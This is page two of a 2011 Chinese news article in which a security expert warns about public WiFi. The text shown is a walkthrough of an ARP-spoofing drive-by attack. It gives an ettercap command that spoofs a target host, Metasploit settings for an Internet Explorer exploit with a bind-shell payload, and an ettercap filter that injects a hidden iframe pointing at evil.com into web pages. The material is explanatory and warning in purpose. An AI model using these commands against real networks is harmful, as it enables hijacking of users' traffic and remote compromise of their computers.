首页 >> 通信网络安全频道 >> 行业动态 >> 正文
 
安恒信息专家指出:小心使用公共场所的WiFi
http://www.cww.net.cn   2011年10月21日 11:03    通信世界网    

三、arp挂马

利用ARP 欺骗把数据流都引到本地,然后替换成我们事先准备好的挂马代码,再转发出去。

ettercap -T -q -F ieexpft -M arp:remote /192.168.1.105/ // 表示对192.168.1.105主机进行arp欺骗 启动Msf的使用

use exploit/windows/browser/ie_iepeers_pointer

set SRVHOST 192.168.1.103(攻击者ip) Msf会自动为我们开启类似服务 其他默认就可下面指定payload使用这个set PAYLOAD window/shell/bind_tcp Payload的选项保持默认就行默认绑定4444端口 目标:0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

下面看一下ettercap的过滤脚本马上开始 ettercap使用的过滤脚本 If(ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data,"Accept-Encoding")) {

replace("Accept-Encoding","Accept-Mousecat");

msg("zapped Accept-Encoding!\n");

}

}

if (ip.proto == TCP && tcp.src == 80) {

if (search(DATA.data, "<body>") ){

replace("<body>","<body> <iframe src=\"http://evil.com/evil.html\"width=0 height=0 >");

msg("Filter Run...&&Exploit Code Injected OK!\n");

[1]  [2]  [3]  
编 辑:高娟    联系电话:010-67110006-853
分享到新浪微博 分享到搜狐微博 分享到腾讯微博 分享到网易微博 分享到139说客 分享到校内人人网 分享到开心网 分享到豆瓣 分享到QQ书签       收藏   打印  进入论坛   推荐给朋友
关键字搜索:安恒信息  WiFi  无线安全  
文章评论查看评论()
昵称:  验证码:
 
相关新闻
即时新闻
通信技术
最新方案
企业黄页
会议活动